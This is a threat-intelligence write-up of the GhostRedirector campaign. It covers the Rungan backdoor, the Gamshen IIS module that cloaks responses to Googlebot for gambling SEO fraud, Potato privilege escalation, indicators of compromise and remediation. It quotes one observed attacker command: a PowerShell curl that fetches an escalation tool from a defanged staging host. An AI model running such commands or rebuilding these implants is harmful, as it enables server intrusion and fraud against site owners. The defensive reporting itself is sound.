ESET researchers have unmasked a compact yet highly effective campaign, dubbed GhostRedirector, that has compromised at least 65 Internet-facing Windows servers worldwide. The operation, active since at least August 2024 and first spotted in telemetry from December 2024 through April 2025, combines a custom passive C++ backdoor with a malicious native IIS module to deliver long-term persistence and server-side SEO fraud as-a-service. The findings, published on WeLiveSecurity, reveal an attacker arsenal that includes never-before-documented malware, publicly available privilege escalation exploits, and a multi-layered persistence model designed to evade detection while monetizing the reputation of legitimate websites.

The campaign's two centerpiece components are Rungan, a passive backdoor that can execute arbitrary commands and create local users, and Gamshen, a malicious IIS module that selectively alters HTTP responses only when the request comes from search engine crawlers like Googlebot. By injecting backlinks or redirecting crawlers to attacker-chosen gambling sites, GhostRedirector effectively turns compromised servers into unwitting participants in a black-hat SEO operation. The victim profile is geographically concentrated in Brazil, Thailand, and Vietnam, with additional incidents in Peru, the United States, and a handful of other nations. Affected organizations span education, healthcare, retail, transportation, technology, and insurance—indicating opportunistic targeting of exposed IIS stacks rather than a single vertical.

Rungan: The Passive C++ Backdoor

Rungan is a native C/C++ implant observed deployed as miniscreen.dll under C:\ProgramData\Microsoft\DRM\log. It uses AES (CBC mode) to decrypt embedded strings and configuration, reusing an implementation likely borrowed from the public AvoidRandomKill repository. The backdoor registers one or more HTTP listeners through the Windows HTTP Server API, effectively bypassing IIS to listen on ports like 80 for specially crafted requests. The default listening URL is http://+:80/v1.0/8888/sys.html, and additional URLs can be specified in a configuration file located at C:\Windows\Microsoft.NET\Framework64\v2.0.50727\1033\vbskui.dll. Rungan parses incoming HTTP requests that match hardcoded parameters and executes backdoor commands. Notable capabilities include creating local user accounts, executing arbitrary commands, and dynamically adding new listening URLs to its configuration.

Because Rungan waits passively for properly formed HTTP requests rather than beaconing out, it reduces its network detection surface. Its ability to create privileged local accounts and execute arbitrary commands makes it a versatile tool for re-establishing footholds, installing additional malware, or acting as an operational remote-control channel even after other artifacts are removed. Defenders must look beyond standard IIS file audits, as Rungan operates independently of the web server's own process space by abusing the HTTP Server API. Hunting for anomalous HTTP registrations or unexpected listeners is essential.

Gamshen: The Crawler-Aware IIS Module for SEO Fraud

Gamshen is implemented as a native C/C++ IIS module DLL that hooks into key IIS event handlers: OnBeginRequest, OnPreExecuteRequestHandler, OnPostExecuteRequestHandler, and OnSendResponse. Its primary goal is to intercept and modify responses destined for search engine crawlers while leaving regular user traffic untouched. The activation flow is meticulous:

  • It checks whether the User-Agent contains Googlebot or the Referer includes google.com.
  • It ignores POST requests and static resources (images, CSS, JavaScript) to avoid breaking normal site behavior.
  • It matches the request URL against a set of regex patterns that include keywords such as android, plays, articles_, details, iosapp, topnews, and joga.

When all conditions are met, Gamshen queries its command-and-control server—hosted on domains like brproxy.868id[.]com and gobr.868id[.]com—for a base64-encoded payload. If the C2 responds with data, Gamshen decodes and injects it into the HTTP response sent to the crawler. If the C2 returns a 404 or is unavailable, the module redirects the crawler to a fallback C2 endpoint. This behavior effectively transforms the compromised site into a doorway or link farm that boosts search engine rankings for the attacker's clients. Forensic evidence, including images recovered via VirusTotal pivoting, indicates the beneficiaries are Portuguese-language gambling sites.

The stealth of Gamshen lies in its in-process execution within w3wp.exe and its dynamic payload delivery. Traditional site audits, file integrity checks, and casual user reports are unlikely to detect the fraud. The module does not leave persistent artifacts in site content directories, and the malicious responses are ephemeral. This technique mirrors earlier IIS-based SEO fraud families like IISerpent (documented by ESET in 2021) and the DragonRank campaign reported by Cisco Talos in 2024. The convergence suggests a cottage industry of SEO manipulation services that leverage compromised IIS infrastructure.

Privilege Escalation: The “Potatoes” and Fallback Accounts

GhostRedirector routinely uses publicly known local privilege escalation exploits from the Potato family—specifically EfsPotato and BadPotato variants—to escalate to SYSTEM and create persistent administrative accounts. These exploits abuse token impersonation semantics (SeImpersonate / SeAssignPrimaryToken) and COM/DCOM server behavior to obtain elevated tokens. Obfuscated .NET binaries (often protected with .NET Reactor) are deployed to either create new local administrator accounts or hijack existing ones via RID-hijacking techniques. ESET recovered usernames such as MysqlServiceEx, MysqlServiceEx2, and Admin, along with password artifacts like the string “huang” (Chinese for yellow).

A reusable .NET library called Comdai (distributed as Common.Global.DLL) underpins many of these privilege escalation tools. Comdai centralizes user creation, HTTP helper routines, named-pipe communication, and service manipulation. One named pipe, salamander_pipe, can receive parameters to create an administrator user on demand. The library also hardcodes a C2 domain https://www.cs01[.]shop for potential outbound communication. The shared PDB path pattern—featuring a distinctive x5 substring—links Comdai with Rungan, Gamshen, and the privilege escalation tools, indicating a unified development environment.

Once attackers gain SYSTEM privileges, they can register native IIS modules, install services, modify ServiceDLL registry values, and create rogue accounts, exactly the vectors observed in this campaign. The fallback accounts ensure persistent access even if the primary implants are discovered and removed.

Tooling and Infrastructure: Reuse and Operational Patterns

GhostRedirector’s tooling exhibits deliberate reuse and careful operational design:

  • A common staging server, 868id[.]com (with subdomains like xzs.868id[.]com and xz.868id[.]com), hosted downloads for all components, including the privilege escalation binaries, Rungan, Gamshen, and even the legitimate GoToHTTP remote administration tool.
  • Valid code-signing certificates (TrustAsia RSA Code Signing CA G3, issued to Shenzhen Diyuan Technology Co., Ltd.) were used to sign several payloads, potentially to evade endpoint defenses.
  • The Zunput tool (SitePut.exe) automatically enumerates IIS websites, drops webshells (ASP, PHP, JavaScript) into directories containing dynamic content, and logs site details to log.txt. The webshell names are chosen randomly from a predefined list and include extensions like .cer, .pjp, .asp, and .aspx.
  • Chinese language strings, the signing certificate’s origin, and password artifacts contribute to ESET’s medium-confidence attribution to a China-aligned threat actor. However, the researchers explicitly frame this as a probabilistic assessment.

Initial access is believed to occur through SQL injection vulnerabilities, with attackers then using PowerShell or CertUtil to download tools from the staging server. Commands observed executing include:

cmd.exe /d /s /c " powershell curl https://xzs.868id[.]com/EfsNetAutoUser_br.exe -OutFile C:\ProgramData\EfsNetAutoUser_br.exe"

and similar calls for EfsPotato_sign.exe, link.exe, and the Gamshen DLLs.

Victimology and Operational Intent

ESET’s telemetry between December 2024 and April 2025, combined with an internet-wide scan in June 2025, identified at least 65 compromised IIS hosts. The true number is likely higher. Victims are concentrated in Latin America and Southeast Asia: Brazil, Peru, Thailand, Vietnam, with U.S.-based servers often leased to companies in those regions. Affected sectors are diverse, underscoring the opportunistic nature of the campaign. The primary motive appears to be monetization through SEO fraud—specifically, boosting gambling sites—rather than data theft or espionage. This aligns with the broader industry trend of SEO-as-a-service criminal enterprises.

Detection and Hunting: Prioritized Signals

Defenders must adopt a multi-layered hunting approach, as the threat blends in-process modules, passive backdoors, and legacy privilege escalation techniques:

  • IIS module registry anomalies: Use appcmd list modules or IIS Manager to audit native module registrations. Check applicationHost.config for unexpected DLL paths, especially under %SystemRoot%\System32\inetsrv or ProgramData. Look for DLLs with names like ManagedEngine64_v2.dll or ManagedEngine32_v2.dll.
  • Crawler-specific response differences: Reproduce requests using Googlebot and regular browser User-Agent strings from trusted IPs. Compare responses. Sudden appearance of injected backlink lists or redirects only for crawler agents is a strong indicator.
  • Sysmon/EDR telemetry: Monitor for named pipe creation (salamander_pipe), CreateProcessAsUser/CreateProcessWithToken usage, and unusual token impersonation events—hallmarks of Potato-style escalation.
  • Known artifacts: Search for files named miniscreen.dll, ManagedEngine64_v2.dll, SitePut.exe, EfsNetAutoUser.exe, DotNet4.5.exe, and link.exe. Check scheduled tasks, ServiceDLL values, and local user accounts for recently created admin users.
  • Network indicators: Monitor outbound HTTP/HTTPS from w3wp.exe to brproxy.868id[.]com, gobr.868id[.]com, xzs.868id[.]com, xz.868id[.]com, q.822th[.]com, and www.cs01[.]shop. Block these domains proactively.

Containment and Remediation Playbook

  1. Isolate and preserve: Immediately disconnect suspected hosts from the network but keep them powered on. Capture memory dumps of w3wp.exe and a forensic image of the system drive before rebooting.
  2. Collect artifacts: Secure applicationHost.config, the IIS module list, scheduled tasks, ServiceDLL registry values, local user lists, event logs, and Sysmon data.
  3. Remove unauthorized IIS modules: Unregister and delete unknown native modules. Do not assume removal equals full recovery—check for fallback accounts and alternate implants.
  4. Purge rogue accounts: Disable or delete suspicious local administrator accounts. Rotate all credentials, revoke certificates, and reset secrets exposed on the compromised system.
  5. Hunt and remove webshells: Scan web directories for files with suspicious names and extensions (.cer, .pjp, .asp, .aspx). Commonly dropped names include C1.php, Cmd.aspx, Error.aspx, K32.asxp, K64.aspx, and LandGrey.asp.
  6. Rebuild: Given the layered persistence, a full rebuild is often safer than incremental cleaning. Rebuild from known-good media and restore data only after thorough analysis.
  7. Harden defenses: Patch all web applications, implement a web application firewall (WAF) tuned to block SQL injection, restrict IIS native module registration to highly privileged accounts, and enforce multi-factor authentication with just-in-time access for administrative roles.

Strategic Risks and Business Impact

The GhostRedirector campaign poses several strategic risks beyond the immediate technical compromise:

  • Search engine penalties: Participating—even unwillingly—in cloaking schemes can lead to de-indexing or ranking demotion by Google. Recovery from such penalties is expensive and organic traffic loss can linger for months.
  • Reputational damage: Customers and partners may lose trust if a company’s website is found to be serving malicious or deceptive content to crawlers.
  • Operational resilience: The attacker’s multi-pronged persistence model means incomplete remediation often results in re-infection. Organizations may face repeated clean-up cycles, driving up incident response costs.
  • Regulatory exposure: If compromised servers process regulated data (healthcare, education, insurance), the incident may trigger breach notification obligations under GDPR, HIPAA, or similar frameworks.

Conclusion

GhostRedirector represents a sophisticated evolution in server-side SEO fraud, combining a stealthy, passive backdoor with a crawler-aware IIS module that abuses the trust of legitimate websites. The campaign's reliance on public privilege escalation exploits and its multi-component persistence make it a resilient threat. For Windows and IIS administrators, the takeaways are clear: internet-facing servers must be instrumented for behavioural detection beyond file signatures, and security teams should actively hunt for the specific indicators outlined by ESET. Given the active exploitation pattern and the likely commercial motive behind the operation, similar campaigns will continue to surface. Defenders must treat any sign of native IIS module tampering or anomalous crawler responses as a high-priority incident.